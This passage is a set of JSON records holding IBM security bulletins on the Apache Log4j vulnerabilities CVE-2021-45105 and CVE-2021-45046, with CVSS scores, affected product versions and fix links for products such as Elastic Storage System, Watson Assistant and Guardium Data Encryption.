\nIBM Sterling Configure, Price, Quote (CPQ)| 10 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now.**\n\nCPQ Visual Modeler Version 10 FP24 is available on Fix central. 
Fix Central Link: [http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+Configurator&fixids=10.0.0.0-Sterling-VM-All-fp00024&source=SAR](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+Configurator&fixids=10.0.0.0-Sterling-VM-All-fp00024&source=SAR>)\n\nRelease Notes: <https://www.ibm.com/docs/en/configurepricequote/10.0?topic=modeler-defects-addressed-in-this-fix-pack>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-28T18:05:14", "type": "ibm", "title": "Security Bulletin: IBM Sterling Configure, Price, Quote is vulnerable to denial of service and arbitrary code execution due to Apache Log4j (CVE-2021-45105 and CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-28T18:05:14", "id": "7DDD006076946810EADC174FC2320565F527D46FFF5270A3D6916BF8993B12F9", "href": "https://www.ibm.com/support/pages/node/6551954", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, 
{"lastseen": "2023-05-23T17:58:41", "description": "## Summary\n\nVulnerabilities in Apache Log4j could allow an attacker to execute arbitrary code or cause a denial of service on the system. This library is used for logging by the Graphical User Interface (GUI) of IBM Spectrum Scale, which is bundled in IBM Elastic Storage System. \n\n## Vulnerability Details\n\n**CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n**DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n**CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n**DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)** | **Version(s)** \n---|--- \nIBM Elastic Storage System | V6.0.1.0 - V6.0.2.3 \nIBM Elastic Storage System | V6.1.0.0 - V6.1.2.1 \n \n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability by installing the IBM Elastic Storage System version specific efix:**\n\nContact IBM Support for your affected versions of ESS 3000, ESS 3200 and ESS 5000 to obtain and apply an efix for your level of code:\n\n**Product(s)** | **Remediation(s)** \n---|--- \nIBM Elastic Storage System \n\nV6.0.1.0 - V6.0.2.3 \n\n| For the fix contact [IBM Support](<https://www.ibm.com/mysupport> \"IBM Support\" ) or [call,](<https://www.ibm.com/docs/en/spectrum-scale/5.0.4?topic=center-how-contact-support> \"call\" ) reference** APAR IJ36851** \n \nIBM Elastic Storage System\n\nV6.1.0.0 - V6.1.2.1\n\n| \n\nFor the fix contact [IBM Support](<https://www.ibm.com/mysupport> \"IBM Support\" ) or [call,](<https://www.ibm.com/docs/en/spectrum-scale/5.0.4?topic=center-how-contact-support> \"call\" ) reference** APAR IJ36818** \n \n**Note**: Selected efixes are on Fix Central, see <https://www.ibm.com/support/pages/node/6537748>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-31T15:31:59", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Apache Log4j impact IBM Elastic Storage System (CVE-2021-45105, CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-31T15:31:59", "id": "90B290F66451E3E462C09788B6756181F62A92A8BAA10F2C4BD52977FD8E1B37", "href": "https://www.ibm.com/support/pages/node/6537750", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:45:31", "description": "## Summary\n\nFor the 8.0.0 version of MSO, which is distributed as part of the MAS catalog, here are the instructions to move to the 8.0.3 version, which includes Apache Log4j 2.17.1 and addresses [CVE-2021-45105] (affecting v2.16) and [CVE-2021-45046] (affecting v2.15). \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Maximo Scheduler Optimization| All \n \n\n\n## Remediation/Fixes\n\n**How to manually get Maximo Scheduler Optimization 8.0.0 (MSO) updated to Apache log4j 2.17.1 **\n\n**IBM strongly suggests the following update: \n**\n\nUpdate the Maximo Scheduler Optimization 8.0.0 installed on Maximo Application Suite (MAS) to Version 8.0.3 of MSO.\n\n### Update **Maximo Scheduler Optimization** application\n\nWhen new versions of applications are available, you can update the deployed applications.\n\nTo update an application:\n\n 1. From the Suite Administration Applications pane, select the Addon tab and find the Maximo Scheduler Optimization application that you want to update.\n 2. 
On the application summary page confirm the 8.0.3 or > version, click **Update**\n\n**Product(s)**| **Version(s) \n**| **Remediation/Fix/Instructions** \n---|---|--- \nIBM Maximo Scheduler Optimization | 8.0| \n\nUpdate [8.0](<https://www.ibm.com/docs/en/mas86/8.6.0?topic=ons-maximo-scheduler-optimization> \"8.0\" ) and follow [instructions](<https://www.ibm.com/docs/en/mas87/8.7.0?topic=ons-maximo-scheduler-optimization> \"instructions\" ) to get the 8.0.3 or > version \n \n## Workarounds and Mitigations\n\nFor MSO 8 version update to the latest version available 8.0.3\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-19T14:06:26", "type": "ibm", "title": "Security Bulletin: Apache log4j security vulnerability as it relates to IBM Maximo Scheduler Optimization - Apache Log4j - [CVE-2021-45105] (affecting v2.16) and [CVE-2021-45046] (affecting v2.15)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-10-19T14:06:26", "id": "965AA3643F2C2723C5C9B471B69786B972B6D81B6C917B50EE5BFD6C8447279C", "href": 
"https://www.ibm.com/support/pages/node/6830617", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:57:14", "description": "## Summary\n\nVulnerabilities in Apache Log4j could result in a denial of service or remote code execution. These vulnerabilities may affect IBM Spectrum Protect Snapshot for VMware due to its use of Log4j for logging of messages and traces. The below fix package includes Log4j 2.17.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Spectrum Protect Snapshot for VMware| 4.1.6.10-4.1.6.13 \n \n## Remediation/Fixes\n\nIBM strongly recommends addressing this vulnerability now by upgrading.\n\n**Note: The below fix package includes Log4j 2.17.**\n\n**_IBM Spectrum Protect Snapshot for VMware Affected Versions \n_**| **_Fixing \nLevel_**| **_Platform_**| **_Link to Fix and Instructions \n_** \n---|---|---|--- \n4.1.6.10-4.1.6.13| 4.1.6.14| Linux| <https://www.ibm.com/support/pages/node/6537580> \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-01T11:37:31", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Apache Log4j affect IBM Spectrum Protect Snapshot for VMware (CVE-2021-45105 and CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-02-01T11:37:31", "id": 
"3220BFD68D0CE5B97E4EC49AFAD94FC9317DA5DFDBD73C624B022C3E93AC4268", "href": "https://www.ibm.com/support/pages/node/6537644", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:57:30", "description": "## Summary\n\nIBM Watson Assistant for IBM Cloud Pak for Data uses Apache Log4j to log diagnostic data. Vulnerabilities in Apache Log4j (CVE-2021-45105 and CVE-2021-45046) impact IBM Watson Assistant for IBM Cloud Pak for Data. The fix includes Apache Log4j v.2.17.0. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. 
\nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Watson Assistant for IBM Cloud Pak for Data| 1.5.0, 4.0.0, 4.0.2, 4.0.4 \n \n \n\n\n## Remediation/Fixes\n\nFor all affected versions, IBM strongly recommends addressing the vulnerability now by upgrading to the upcoming latest (v4.0.5) release of IBM Watson Assistant for IBM Cloud Pak for Data which maintains backward compatibility with the versions listed above. \n\n**Product Latest Version**| **Remediation/Fix/Instructions** \n---|--- \nIBM Watson Assistant for IBM Cloud Pak for Data 4.0.5| \n\nFollow instructions for Installing Watson Assistant in Link to Release (v4.0.5 release information)\n\n<https://www.ibm.com/docs/en/cloud-paks/cp-data/4.0?topic=assistant-installing-watson> \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-27T17:31:15", "type": "ibm", "title": "Security Bulletin: IBM Watson Assistant for IBM Cloud Pak for Data is vulnerable to denial of service and arbitrary code execution due to Apache Log4j (CVE-2021-45105 and CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", 
"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-27T17:31:15", "id": "7295DCCE494A2CA195C0EC2BD4F052B62F3E1B45826D03ABBF986B81F58BDD31", "href": "https://www.ibm.com/support/pages/node/6551430", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:57:53", "description": "## Summary\n\nThere are vulnerabilities in the Apache Log4j library used by IBM Robotic Process Automation with Automation Anywhere. This affects the IBM Robotic Process Automation with Automation Anywhere control room application. This vulnerability has been addressed by upgrading the Apache Log4j library to version 2.17.0.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Robotic Process Automation with Automation Anywhere| 11.0 \n \n\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by upgrading to interim fixpack [11.0.0.10-IF004](<https://www.ibm.com/support/pages/node/6540266> \"11.0.0.10-IF004\" ).\n\n## Workarounds and Mitigations\n\nIf the fixpack 11.0.0.10-IF004 cannot be applied immediately, follow the mitigation steps provided by Automation Anywhere, which can be found [here](<https://apeople.automationanywhere.com/s/article/AA-11-x-Update-regarding-CVE-2021-44228-related-to-0-day-in-the-Apache-Log4j2-Java-library> \"here\" ) (Apeople login required).\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": 
"3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-16T04:06:38", "type": "ibm", "title": "Security Bulletin: Due to use of Apache Log4j, IBM Robotic Process Automation with Automation Anywhere is vulnerable to arbitrary code execution (CVE-2021-45046) and denial of service (CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-16T04:06:38", "id": "A2133DCF0D67EC30E5F3D15E39561490E1B16A2750CD5C806DC8F9E95825E247", "href": "https://www.ibm.com/support/pages/node/6541224", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:58:44", "description": "## Summary\n\nVulnerability in Apache Log4j affects IBM Guardium Data Encryption (GDE) (CVE-2021-45105 and CVE-2021-45046). The patch includes Apache Log4j 2.17.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. 
\nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product| Affected Component Name| Affected Version \n---|---|--- \nGDE (4.0.0.6)| Guardium Cloud Key Manager (GCKM) Appliance| 1.10.0 and 1.10.1 \nGDE (4.0.0.5)| Guardium Cloud Key Manager (GCKM) Appliance| 1.9 \n \n\n\n## Remediation/Fixes\n\nDownload and apply the patch for the GCKM appliance provided by Thales. Customers are encouraged to act quickly to update their systems. 
\n\nNote: Users need to log in to the Thales support portal to access the links below.\n\nAffected Product| Affected Component Name and Version| Patch link \n---|---|--- \nGDE (4.0.0.6)| Guardium Cloud Key Manager (GCKM) Appliance (V1.10.1)| [https://supportportal.thalesgroup.com/csm?id=kb_article_view&sys_kb_id=a0c7c50cdb13f850520c470505961948&sysparm_article=KB0024988](<https://supportportal.thalesgroup.com/csm?id=kb_article_view&sys_kb_id=a0c7c50cdb13f850520c470505961948&sysparm_article=KB0024988>) \nGDE (4.0.0.6)| Guardium Cloud Key Manager (GCKM) Appliance (V1.10)| [https://supportportal.thalesgroup.com/csm?id=kb_article_view&sys_kb_id=c22619b41b55fc10e2af520f6e4bcb97&sysparm_article=KB0024583](<https://supportportal.thalesgroup.com/csm?id=kb_article_view&sys_kb_id=c22619b41b55fc10e2af520f6e4bcb97&sysparm_article=KB0024583>) \nGDE (4.0.0.5)| Guardium Cloud Key Manager (GCKM) Appliance (V1.9)| [https://supportportal.thalesgroup.com/csm?id=kb_article_view&sys_kb_id=1f4ca87edbc36810520c47050596192a&sysparm_article=KB0023969](<https://supportportal.thalesgroup.com/csm?id=kb_article_view&sys_kb_id=1f4ca87edbc36810520c47050596192a&sysparm_article=KB0023969>) \n \n## Workarounds and Mitigations\n\nCustomers need to apply the patch; refer to the \"Remediation/Fixes\" section for patch links.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-29T07:53:09", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects IBM Guardium Data Encryption (GDE) (CVE-2021-45105 and CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-29T07:53:09", "id": "5C2309A832A981E871A38D52C9E19A6D60138A5FF04933E55F3319A964A350A7", "href": "https://www.ibm.com/support/pages/node/6537486", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:57:32", "description": "## Summary\n\nThere are multiple Apache Log4j vulnerabilities (CVE-2021-45105, CVE-2021-45046) impacting IBM Watson Machine Learning in Cloud Pak for Data which uses Apache Log4j for logging. The fix includes Apache Log4j 2.17.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. 
